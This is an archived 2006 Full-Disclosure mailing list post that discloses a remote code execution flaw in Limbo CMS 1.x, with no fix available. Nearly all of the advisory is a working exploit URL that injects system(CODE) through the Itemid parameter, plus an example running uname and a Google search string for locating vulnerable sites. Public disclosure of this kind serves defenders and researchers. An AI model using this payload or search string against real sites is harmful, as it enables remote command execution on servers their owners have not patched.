[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Limbo CMS code execution
From: "Alexander Hristov" <joffer () gmail ! com>
Date: 2006-02-28 23:34:09
Message-ID: 734063a30602281534gadc67abj6d1fa4a163a43ae1 () mail ! gmail ! com
[Download RAW message or body]
Official page : http://www.limbo-cms.com/
Vulnerable : Limbo 1.*
Fix : No
Bug : http://somehost/path-to-limbo/index.php?option=frontpage&Itemid=system(CODE)
example : index.php?option=frontpage&Itemid=system(uname)
Google search string : inurl:"option=frontpage"
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic